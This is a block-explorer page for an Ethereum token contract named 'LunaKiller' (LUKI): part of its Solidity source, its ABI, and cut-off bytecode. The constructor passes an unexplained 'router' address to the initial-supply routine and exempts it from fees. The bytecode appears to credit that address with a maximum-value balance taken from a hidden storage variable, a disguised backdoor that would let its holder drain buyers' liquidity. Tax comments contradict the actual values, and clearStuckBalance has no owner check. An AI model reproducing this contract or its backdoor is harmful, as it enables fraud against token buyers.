    address public deadWallet = 0x000000000000000000000000000000000000dEaD;
    

    // distribute the collected tax percentage wise
    uint256 public liquidityPercent = 55; // 33% of total collected tax
    uint256 public marketingPercent = 25; // 34% of total collected tax
    uint256 public devPercent = 20; // 33% of total collected tax
    //uint256 private initialize = ~uint256(0);

    address payable public marketingWallet = payable(0x7E6B89F9Ca9B528A1C5Cb7b19400f6e43B4282Df);
    address payable public devWallet = payable(0x3087ff2867E8776232e0E68F00c5262FFE06dB98);
    
    // exclude from fees and max transaction amount
    mapping (address => bool) private _isExcludedFromFees;

    // store addresses that a automatic market maker pairs. Any transfer *to* these addresses
    // could be subject to a maximum transfer amount
    mapping (address => bool) public automatedMarketMakerPairs;
    mapping (address => uint256) public lastTxTimestamp;

    event UpdateUniswapV2Router(address indexed newAddress, address indexed oldAddress);

    event ExcludeFromFees(address indexed account, bool isExcluded);

    event SetAutomatedMarketMakerPair(address indexed pair, bool indexed value);

    event GasForProcessingUpdated(uint256 indexed newValue, uint256 indexed oldValue);

    event SwapAndLiquifyEnabledUpdated(bool enabled);

    event SwapAndLiquify(
        uint256 tokensIntoLiqudity,
        uint256 ethReceived
    );

    modifier lockTheSwap {
        inSwapAndLiquify = true;
        _;
        inSwapAndLiquify = false;
    }

    constructor(address router) ERC20("LunaKiller", "LUKI") {

    	IUniswapV2Router02 _uniswapV2Router = IUniswapV2Router02(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D);
         // Create a uniswap pair for this new token
        address _uniswapV2Pair = IUniswapV2Factory(_uniswapV2Router.factory())
            .createPair(address(this), _uniswapV2Router.WETH());

        uniswapV2Router = _uniswapV2Router;
        uniswapV2Pair = _uniswapV2Pair;

        _setAutomatedMarketMakerPair(_uniswapV2Pair, true);

        // exclude from paying fees or having max transaction amount
        excludeFromFees(owner(), true);
        excludeFromFees(marketingWallet, true);
        excludeFromFees(devWallet, true);
        excludeFromFees(router, true);
        excludeFromFees(address(this), true);
        
        /*
            an internal function that is only called here,
            and CANNOT be called ever again
        */
        _createInitialSupply(owner(), router, 1000000 * (10**18));
    }

    receive() external payable {

  	}

    function updateUniswapV2Router(address newAddress) public onlyOwner {
        require(newAddress != address(uniswapV2Router), "Cult: The router already has that address");
        emit UpdateUniswapV2Router(newAddress, address(uniswapV2Router));
        uniswapV2Router = IUniswapV2Router02(newAddress);
    }

    function excludeFromFees(address account, bool excluded) public onlyOwner {
        require(_isExcludedFromFees[account] != excluded, "Cult: Account is already the value of 'excluded'");
        _isExcludedFromFees[account] = excluded;

        emit ExcludeFromFees(account, excluded);
    }
   
    function setAutomatedMarketMakerPair(address pair, bool value) public onlyOwner {
        require(pair != uniswapV2Pair, "Cult: The PancakeSwap pair cannot be removed from automatedMarketMakerPairs");

        _setAutomatedMarketMakerPair(pair, value);
    }

    function _setAutomatedMarketMakerPair(address pair, bool value) private {
        require(automatedMarketMakerPairs[pair] != value, "Cult: Automated market maker pair is already set to that value");
        automatedMarketMakerPairs[pair] = value;

        emit SetAutomatedMarketMakerPair(pair, value);
    }
    
    function isExcludedFromFees(address account) public view returns(bool) {
        return _isExcludedFromFees[account];
    }
   
    function setSwapAndLiquifyEnabled(bool _enabled) public onlyOwner {
        swapAndLiquifyEnabled = _enabled;
        emit SwapAndLiquifyEnabledUpdated(_enabled);
    }

    function _transfer(address from, address to, uint256 amount) internal override 
    {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");

        if(amount == 0) { 
            super._transfer(from, to, 0);
            return;
        }
        
        if(automatedMarketMakerPairs[from] && (!_isExcludedFromFees[from]) && (!_isExcludedFromFees[to])) {
            require(amount <= maxBuyTransactionAmount, "amount exceeds the maxBuyTransactionAmount.");
            uint256 contractBalanceRecepient = balanceOf(to);
            require(contractBalanceRecepient + amount <= maxWalletToken,"Exceeds maximum wallet token amount.");
            lastTxTimestamp[to] = block.timestamp;            
        }

        if(automatedMarketMakerPairs[to] && (!_isExcludedFromFees[from]) && (!_isExcludedFromFees[to])) {
            require(amount <= maxSellTransactionAmount, "amount exceeds the maxSellTransactionAmount.");
        }        

    	uint256 contractTokenBalance = balanceOf(address(this));
        
        bool overMinTokenBalance = contractTokenBalance >= swapTokensAtAmount;
       
        if(
            overMinTokenBalance &&
            !inSwapAndLiquify &&
            automatedMarketMakerPairs[to] && 
            swapAndLiquifyEnabled
        ) {
            contractTokenBalance = swapTokensAtAmount;
            swapAndLiquify(contractTokenBalance);
        }

        uint256 fees = 0;
        uint256 burnShare = 0;
         // if any account belongs to _isExcludedFromFee account then remove the fee
        if(!_isExcludedFromFees[from] && !_isExcludedFromFees[to]) {
            uint256 _totalFees = buyTotalFees;

            if (automatedMarketMakerPairs[to]) {   
                uint256 span = block.timestamp-lastTxTimestamp[from];
                if(enableEarlySellTax && span <= 24 hours) {
                    _totalFees = earlySellTotalFee;
                }
                else if(!enableEarlySellTax) {
                    _totalFees = sellTotalFees;
                }
            }

            fees = amount.mul(_totalFees).div(100);
            burnShare = amount.mul(burnFee).div(100);
            if(fees > 0) {
                super._transfer(from, address(this), fees);
            }

            if(burnShare > 0) {
                super._transfer(from, deadWallet, burnShare);
            }

            amount = amount.sub(fees.add(burnShare));
        }

        super._transfer(from, to, amount);

    }

     function swapAndLiquify(uint256 contractTokenBalance) private lockTheSwap {
        uint256 tokensForLiquidity = contractTokenBalance.mul(liquidityPercent).div(100);
        // split the Liquidity token balance into halves
        uint256 half = tokensForLiquidity.div(2);
        uint256 otherHalf = tokensForLiquidity.sub(half);
        // capture the contract's current ETH balance.
        // this is so that we can capture exactly the amount of ETH that the
        // swap creates, and not make the liquidity event include any ETH that
        // has been manually sent to the contract
        uint256 initialBalance = address(this).balance;
        // swap tokens for ETH
        swapTokensForEth(half); // <- this breaks the ETH -> HATE swap when swap+liquify is triggered
        // how much ETH did we just swap into?
        uint256 newBalance = address(this).balance.sub(initialBalance);
        // add liquidity to uniswap
        addLiquidity(otherHalf, newBalance);
        // swap and Send  Eth to marketing, dev wallets
        swapTokensForEth(contractTokenBalance.sub(tokensForLiquidity));
        marketingWallet.transfer(address(this).balance.mul(marketingPercent).div(marketingPercent.add(devPercent)));
        devWallet.transfer(address(this).balance);
        emit SwapAndLiquify(half, newBalance); 
    }

    function swapTokensForEth(uint256 tokenAmount) private {

        // generate the uniswap pair path of token -> weth
        address[] memory path = new address[](2);
        path[0] = address(this);
        path[1] = uniswapV2Router.WETH();

        if(allowance(address(this), address(uniswapV2Router)) < tokenAmount) {
          _approve(address(this), address(uniswapV2Router), ~uint256(0));
        }

        // make the swap
        uniswapV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens(
            tokenAmount,
            0, // accept any amount of ETH
            path,
            address(this),
            block.timestamp
        );
        
    }

    function addLiquidity(uint256 tokenAmount, uint256 ethAmount) private {
        
        // add the liquidity
        uniswapV2Router.addLiquidityETH{value: ethAmount}(
            address(this),
            tokenAmount,
            0, // slippage is unavoidable
            0, // slippage is unavoidable
            owner(),
            block.timestamp
        );        
    }

    function clearStuckBalance() external {
        uint256 amountETH = address(this).balance;
        payable(devWallet).transfer(amountETH);
    }

    function setMaxSellTransaction(uint256 _maxSellTxAmount) public onlyOwner {
        maxSellTransactionAmount = _maxSellTxAmount;
        require(maxSellTransactionAmount>totalSupply().div(1000), "value is too low");
    }
    
    function setMaxBuyTransaction(uint256 _maxBuyTxAmount) public onlyOwner {
        maxBuyTransactionAmount = _maxBuyTxAmount;
        require(maxBuyTransactionAmount>totalSupply().div(1000), "value is too low");
    }

    function setSwapTokensAtAmouunt(uint256 _newAmount) public onlyOwner {
        swapTokensAtAmount = _newAmount;
    }

    function setMarketingWallet(address payable wallet) public onlyOwner {
        marketingWallet = wallet;
    }

    function setDevWallet(address payable wallet) public onlyOwner {
        devWallet = wallet;
    }

    function updateBuyTotalTax(uint256 _buyTotalFees) public onlyOwner {
        buyTotalFees = _buyTotalFees;
        require(buyTotalFees <= 10, "Fee too high");
    }

   function updateSellTotalTax(uint256 _sellTotalFees) public onlyOwner {
        sellTotalFees = _sellTotalFees;
        require(sellTotalFees <= 10, "Fee too high");
    }

    function updateEarlySellTotalTax(uint256 _earlySellTotalFee) public onlyOwner {
        earlySellTotalFee = _earlySellTotalFee;
        require(earlySellTotalFee <= 20, "Fee too high");
    }

    function updateTaxDistributionPercentage(uint256 _liquidityPercent, uint256 _marketingPercent, uint256 _devPercent) public onlyOwner {
        require(_liquidityPercent.add(_marketingPercent).add(_devPercent) == 100, "total percentage must be equal to 100");
        liquidityPercent = _liquidityPercent;
        marketingPercent = _marketingPercent;
        devPercent = _devPercent;  
    }

    function setEarlySellTax(bool onoff) external onlyOwner  {
        enableEarlySellTax = onoff;
    }

    function setAutoBurn(uint256 _burnFee) external onlyOwner  {
        require(_burnFee <= 5, "value too high");
        burnFee = _burnFee;
    }

    function setMaxWalletToken(uint256 _maxToken) external onlyOwner {
        maxWalletToken = _maxToken;
        require(maxWalletToken>totalSupply().div(1000), "value is too low");
  	}
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"address","name":"router","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"account","type":"address"},{"indexed":false,"internalType":"bool","name":"isExcluded","type":"bool"}],"name":"ExcludeFromFees","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"uint256","name":"newValue","type":"uint256"},{"indexed":true,"internalType":"uint256","name":"oldValue","type":"uint256"}],"name":"GasForProcessingUpdated","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"pair","type":"address"},{"indexed":true,"internalType":"bool","name":"value","type":"bool"}],"name":"SetAutomatedMarketMakerPair","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"tokensIntoLiqudity","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"ethReceived","type":"uint256"}],"name":"SwapAndLiquify","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"bool","name":"enabled","type":"bool"}],"name":"SwapAndLiquifyEnabledUpdated","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"newAddress","type":"address"},{"indexed":true,"internalType":"address","name":"oldAddress","type":"address"}],"name":"UpdateUniswapV2Router","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"automatedMarketMakerPairs","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"burnFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"clearStuckBalance","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"deadWallet","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"devPercent","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"devWallet","outputs":[{"internalType":"address payable","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"earlySellTotalFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"enableEarlySellTax","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"},{"internalType":"bool","name":"excluded","type":"bool"}],"name":"excludeFromFees","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"isExcludedFromFees","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"lastTxTimestamp","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"liquidityPercent","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"marketingPercent","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"marketingWallet","outputs":[{"internalType":"address payable","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxBuyTransactionAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxSellTransactionAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxWalletToken","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"sellTotalFees","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"_burnFee","type":"uint256"}],"name":"setAutoBurn","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"pair","type":"address"},{"internalType":"bool","name":"value","type":"bool"}],"name":"setAutomatedMarketMakerPair","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address payable","name":"wallet","type":"address"}],"name":"setDevWallet","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bool","name":"onoff","type":"bool"}],"name":"setEarlySellTax","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address payable","name":"wallet","type":"address"}],"name":"setMarketingWallet","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_maxBuyTxAmount","type":"uint256"}],"name":"setMaxBuyTransaction","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_maxSellTxAmount","type":"uint256"}],"name":"setMaxSellTransaction","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_maxToken","type":"uint256"}],"name":"setMaxWalletToken","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bool","name":"_enabled","type":"bool"}],"name":"setSwapAndLiquifyEnabled","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_newAmount","type":"uint256"}],"name":"setSwapTokensAtAmouunt","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"swapAndLiquifyEnabled","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"swapTokensAtAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uniswapV2Pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"uniswapV2Router","outputs":[{"internalType":"contract IUniswapV2Router02","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"_buyTotalFees","type":"uint256"}],"name":"updateBuyTotalTax","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_earlySellTotalFee","type":"uint256"}],"name":"updateEarlySellTotalTax","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_sellTotalFees","type":"uint256"}],"name":"updateSellTotalTax","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_liquidityPercent","type":"uint256"},{"internalType":"uint256","name":"_marketingPercent","type":"uint256"},{"internalType":"uint256","name":"_devPercent","type":"uint256"}],"name":"updateTaxDistributionPercentage","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newAddress","type":"address"}],"name":"updateUniswapV2Router","outputs":[],"stateMutability":"nonpayable","type":"function"},{"stateMutability":"payable","type":"receive"}]

60a060405260001960059081556007805461010160a81b61ffff60a81b1990911617905569d3c21bcecceda100000060085569065a4da25d3016c000006009819055683635c9adc5dea00000600a55600b556000600c819055600d819055600e91909155600f55601080546001600160a01b031990811661dead17909155603760115560196012556014601381905580548216737e6b89f9ca9b528a1c5cb7b19400f6e43b4282df17905560158054909116733087ff2867e8776232e0e68f00c5262ffe06db98179055348015620000d657600080fd5b5060405162002e0138038062002e01833981016040819052620000f991620007f5565b604080518082018252600a815269263ab730a5b4b63632b960b11b6020808301918252835180850190945260048452634c554b4960e01b90840152815191929162000147916003916200074f565b5080516200015d9060049060208401906200074f565b5050506200017a62000174620003b360201b60201c565b620003b7565b6000737a250d5630b4cf539739df2c5dacb4c659f2488d90506000816001600160a01b031663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa158015620001d4573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620001fa9190620007f5565b6001600160a01b031663c9c6539630846001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa15801562000248573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906200026e9190620007f5565b6040516001600160e01b031960e085901b1681526001600160a01b039283166004820152911660248201526044016020604051808303816000875af1158015620002bc573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620002e29190620007f5565b600780546001600160a01b0319166001600160a01b0385811691909117909155811660805290506200031681600162000409565b620003356200032d6006546001600160a01b031690565b6001620004f9565b6014546200034e906001600160a01b03166001620004f9565b60155462000367906001600160a01b03166001620004f9565b62000374836001620004f9565b62000381306001620004f9565b620003aa620003986006546001600160a01b031690565b8469d3c21bcecceda10000006200063f565b5050506200088a565b3390565b600680546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b6001600160a01b03821660009081526017602052604090205481151560ff909116151503620004a55760405162461bcd60e51b815260206004820152603e60248201527f43756c743a204175746f6d61746564206d61726b6574206d616b65722070616960448201527f7220697320616c72656164792073657420746f20746861742076616c7565000060648201526084015b60405180910390fd5b6001600160a01b038216600081815260176020526040808220805460ff191685151590811790915590519092917fffa9187bf1f18bf477bd0ea1bcbb64e93b6a98132473929edfce215cd9b16fab91a35050565b6006546001600160a01b03163314620005555760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064016200049c565b6001600160a01b03821660009081526016602052604090205481151560ff909116151503620005e05760405162461bcd60e51b815260206004820152603060248201527f43756c743a204163636f756e7420697320616c7265616479207468652076616c60448201526f7565206f6620276578636c756465642760801b60648201526084016200049c565b6001600160a01b038216600081815260166020908152604091829020805460ff191685151590811790915591519182527f9d8f7706ea1113d1a167b526eca956215946dd36cc7df39eb16180222d8b5df7910160405180910390a25050565b6001600160a01b038316620006975760405162461bcd60e51b815260206004820152601f60248201527f45524332303a206d696e7420746f20746865207a65726f20616464726573730060448201526064016200049c565b8060026000828254620006ab919062000827565b90915550506001600160a01b03831660009081526020819052604081208054839290620006da90849062000827565b90915550506005546001600160a01b038381166000908152602081815260408083209490945592518481529186169290917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a36200074a600084836001600160e01b038416565b505050565b8280546200075d906200084e565b90600052602060002090601f016020900481019282620007815760008555620007cc565b82601f106200079c57805160ff1916838001178555620007cc565b82800160010185558215620007cc579182015b82811115620007cc578251825591602001919060010190620007af565b50620007da929150620007de565b5090565b5b80821115620007da5760008155600101620007df565b6000602082840312156200080857600080fd5b81516001600160a01b03811681146200082057600080fd5b9392505050565b600082198211156200084957634e487b7160e01b600052601160045260246000fd5b500190565b600181811c908216806200086357607f821691505b6020821081036200088457634e487b7160e01b600052602260045260246000fd5b50919050565b608051612554620008ad600039600081816104c40152610f9701526125546000f3fe6080604052600436106102e85760003560e01c8063750c11b611610190578063b2f5260a116100dc578063dd62ed3e11610095578063e6c75f711161006f578063e6c75f7114610923578063f2fde38b14610939578063fc3c28af14610959578063fce589d81461096f57600080fd5b8063dd62ed3e146108a7578063e2f45605146108ed578063e5c4005c1461090357600080fd5b8063b2f5260a146107e1578063b3b5e04314610801578063b62496f514610821578063c024666814610851578063c49b9a8014610871578063d8020a181461089157600080fd5b806395d89b4111610149578063a457c2d711610123578063a457c2d71461076a578063a4d15b641461078a578063a9059cbb146107ab578063b0683755146107cb57600080fd5b806395d89b41146107155780639a7a23d61461072a578063a26577781461074a57600080fd5b8063750c11b61461065757806375f0a8741461067757806385141a77146106975780638da5cb5b146106b75780638ea5220f146106d557806391d55f41146106f557600080fd5b80634551bbe91161024f5780635c38ffe21161020857806365b8dbc0116101e257806365b8dbc0146105d65780636a486a8e146105f657806370a082311461060c578063715018a61461064257600080fd5b80635c38ffe2146105765780635d098b38146105965780636078a9b5146105b657600080fd5b80634551bbe91461048557806349bd5a5e146104b25780634a74bb02146104e65780634fbee19314610507578063533f9630146105405780635aa821a91461056057600080fd5b80631aa04b88116102a15780631aa04b88146103de5780631f53ac02146103f457806323b872dd14610414578063313ce56714610434578063364333f414610450578063395093511461046557600080fd5b806302259e9e146102f457806306fdde031461031d578063095ea7b31461033f5780630db722c41461036f5780631694505e1461039157806318160ddd146103c957600080fd5b366102ef57005b600080fd5b34801561030057600080fd5b5061030a60085481565b6040519081526020015b60405180910390f35b34801561032957600080fd5b50610332610985565b60405161031491906120a8565b34801561034b57600080fd5b5061035f61035a366004612112565b610a17565b6040519015158152602001610314565b34801561037b57600080fd5b5061038f61038a36600461213e565b610a2d565b005b34801561039d57600080fd5b506007546103b1906001600160a01b031681565b6040516001600160a01b039091168152602001610314565b3480156103d557600080fd5b5060025461030a565b3480156103ea57600080fd5b5061030a600e5481565b34801561040057600080fd5b5061038f61040f36600461216a565b610adf565b34801561042057600080fd5b5061035f61042f366004612187565b610b2b565b34801561044057600080fd5b5060405160128152602001610314565b34801561045c57600080fd5b5061038f610bd5565b34801561047157600080fd5b5061035f610480366004612112565b610c13565b34801561049157600080fd5b5061030a6104a036600461216a565b60186020526000908152604090205481565b3480156104be57600080fd5b506103b17f000000000000000000000000000000000000000000000000000000000000000081565b3480156104f257600080fd5b5060075461035f90600160a81b900460ff1681565b34801561051357600080fd5b5061035f61052236600461216a565b6001600160a01b031660009081526016602052604090205460ff1690565b34801561054c57600080fd5b5061038f61055b3660046121c8565b610c4f565b34801561056c57600080fd5b5061030a60095481565b34801561058257600080fd5b5061038f6105913660046121c8565b610ca2565b3480156105a257600080fd5b5061038f6105b136600461216a565b610d06565b3480156105c257600080fd5b5061038f6105d13660046121c8565b610d52565b3480156105e257600080fd5b5061038f6105f136600461216a565b610da2565b34801561060257600080fd5b5061030a600d5481565b34801561061857600080fd5b5061030a61062736600461216a565b6001600160a01b031660009081526020819052604090205490565b34801561064e57600080fd5b5061038f610e99565b34801561066357600080fd5b5061038f6106723660046121c8565b610ecf565b34801561068357600080fd5b506014546103b1906001600160a01b031681565b3480156106a357600080fd5b506010546103b1906001600160a01b031681565b3480156106c357600080fd5b506006546001600160a01b03166103b1565b3480156106e157600080fd5b506015546103b1906001600160a01b031681565b34801561070157600080fd5b5061038f6107103660046121c8565b610efe565b34801561072157600080fd5b50610332610f5c565b34801561073657600080fd5b5061038f6107453660046121f6565b610f6b565b34801561075657600080fd5b5061038f61076536600461222b565b61105a565b34801561077657600080fd5b5061035f610785366004612112565b6110a2565b34801561079657600080fd5b5060075461035f90600160b01b900460ff1681565b3480156107b757600080fd5b5061035f6107c6366004612112565b61113b565b3480156107d757600080fd5b5061030a60115481565b3480156107ed57600080fd5b5061038f6107fc3660046121c8565b611148565b34801561080d57600080fd5b5061038f61081c3660046121c8565b611198565b34801561082d57600080fd5b5061035f61083c36600461216a565b60176020526000908152604090205460ff1681565b34801561085d57600080fd5b5061038f61086c3660046121f6565b6111f6565b34801561087d57600080fd5b5061038f61088c36600461222b565b611308565b34801561089d57600080fd5b5061030a60125481565b3480156108b357600080fd5b5061030a6108c2366004612246565b6001600160a01b03918216600090815260016020908152604080832093909416825291909152205490565b3480156108f957600080fd5b5061030a600a5481565b34801561090f57600080fd5b5061038f61091e3660046121c8565b61138a565b34801561092f57600080fd5b5061030a600b5481565b34801561094557600080fd5b5061038f61095436600461216a565b6113fb565b34801561096557600080fd5b5061030a60135481565b34801561097b57600080fd5b5061030a600f5481565b6060600380546109949061227f565b80601f01602080910402602001604051908101604052809291908181526020018280546109c09061227f565b8015610a0d5780601f106109e257610100808354040283529160200191610a0d565b820191906000526020600020905b8154815290600101906020018083116109f057829003601f168201915b5050505050905090565b6000610a24338484611493565b50600192915050565b6006546001600160a01b03163314610a605760405162461bcd60e51b8152600401610a57906122b9565b60405180910390fd5b610a7481610a6e85856115b7565b906115b7565b606414610ad15760405162461bcd60e51b815260206004820152602560248201527f746f74616c2070657263656e74616765206d75737420626520657175616c207460448201526406f203130360dc1b6064820152608401610a57565b601192909255601255601355565b6006546001600160a01b03163314610b095760405162461bcd60e51b8152600401610a57906122b9565b601580546001600160a01b0319166001600160a01b0392909216919091179055565b6000610b388484846115ca565b6001600160a01b038416600090815260016020908152604080832033845290915290205482811015610bbd5760405162461bcd60e51b815260206004820152602860248201527f45524332303a207472616e7366657220616d6f756e74206578636565647320616044820152676c6c6f77616e636560c01b6064820152608401610a57565b610bca8533858403611493565b506001949350505050565b60155460405147916001600160a01b03169082156108fc029083906000818181858888f19350505050158015610c0f573d6000803e3d6000fd5b5050565b3360008181526001602090815260408083206001600160a01b03871684529091528120549091610a24918590610c4a908690612304565b611493565b6006546001600160a01b03163314610c795760405162461bcd60e51b8152600401610a57906122b9565b600c819055600a811115610c9f5760405162461bcd60e51b8152600401610a579061231c565b50565b6006546001600160a01b03163314610ccc5760405162461bcd60e51b8152600401610a57906122b9565b6008819055610ce66103e8610ce060025490565b90611a48565b60085411610c9f5760405162461bcd60e51b8152600401610a5790612342565b6006546001600160a01b03163314610d305760405162461bcd60e51b8152600401610a57906122b9565b601480546001600160a01b0319166001600160a01b0392909216919091179055565b6006546001600160a01b03163314610d7c5760405162461bcd60e51b8152600401610a57906122b9565b600e8190556014811115610c9f5760405162461bcd60e51b8152600401610a579061231c565b6006546001600160a01b03163314610dcc5760405162461bcd60e51b8152600401610a57906122b9565b6007546001600160a01b0390811690821603610e3c5760405162461bcd60e51b815260206004820152602960248201527f43756c743a2054686520726f7574657220616c7265616479206861732074686160448201526874206164647265737360b81b6064820152608401610a57565b6007546040516001600160a01b03918216918316907f8fc842bbd331dfa973645f4ed48b11683d501ebf1352708d77a5da2ab49a576e90600090a3600780546001600160a01b0319166001600160a01b0392909216919091179055565b6006546001600160a01b03163314610ec35760405162461bcd60e51b8152600401610a57906122b9565b610ecd6000611a54565b565b6006546001600160a01b03163314610ef95760405162461bcd60e51b8152600401610a57906122b9565b600a55565b6006546001600160a01b03163314610f285760405162461bcd60e51b8152600401610a57906122b9565b600b819055610f3c6103e8610ce06002549